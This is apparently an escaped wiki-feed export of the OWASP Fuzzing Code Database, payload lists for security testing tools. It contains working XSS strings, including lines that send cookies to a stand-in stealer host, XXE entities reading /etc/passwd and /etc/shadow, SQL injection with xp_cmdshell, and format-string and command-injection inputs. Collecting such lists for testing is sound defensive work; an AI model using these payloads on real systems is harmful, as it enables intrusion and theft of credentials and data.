&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/style&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;blah&amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;gt;&amp;lt;script&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;script&amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;&amp;lt;script&amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;lt;&amp;lt;/script&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;script&amp;gt;alert(document.cookie);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;ltscript&amp;amp;gtalert(document.cookie);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;ltscript&amp;amp;gtalert(document.cookie);&amp;amp;ltscript&amp;amp;gtalert&lt;br /&gt;
&amp;lt;xss&amp;gt;&amp;lt;script&amp;gt;alert('WXSS')&amp;lt;/script&amp;gt;&amp;lt;/vulnerable&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=javascript:alert(&amp;amp;quot;WXSS&amp;amp;quot;)&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;amp;#x09;ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;amp;#x0A;ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;amp;#x0D;ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG%20SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;script&amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;lt;/script&amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;gt;&amp;lt;/SCRIPT&amp;gt;!--&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;=&amp;amp;{}&lt;br /&gt;
'';!--&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;lt;name&amp;gt;','')); phpinfo(); exit;/*&amp;lt;/name&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;script&amp;gt;var n=0;while(true){n++;}&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('XSS');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('XSS');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[' or 1=1 or ''=']]&amp;gt;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;]]&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Project Contributor ====&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]&lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']]&lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]&lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project|Fuzzing Code Database]]&lt;br /&gt;
[[Category:OWASP Document]]&lt;br /&gt;
[[Category:OWASP Alpha Quality Document]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67502</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67502"/>
				<updated>2009-08-11T19:17:19Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.&lt;br /&gt;
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.&lt;br /&gt;
Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News ====&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009'''&lt;br /&gt;
	&lt;br /&gt;
* Updated the objectives of the project. &lt;br /&gt;
&lt;br /&gt;
'''21 July 2009'''&lt;br /&gt;
&lt;br /&gt;
* Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.&lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project:&lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project&lt;br /&gt;
2 - Browser&lt;br /&gt;
3 - Operational System&lt;br /&gt;
4 - Databases&lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:&lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.&lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.&lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements.&lt;br /&gt;
&lt;br /&gt;
==== Statements ====&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection (Update: 11 August 2009 Total Statements: 126===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
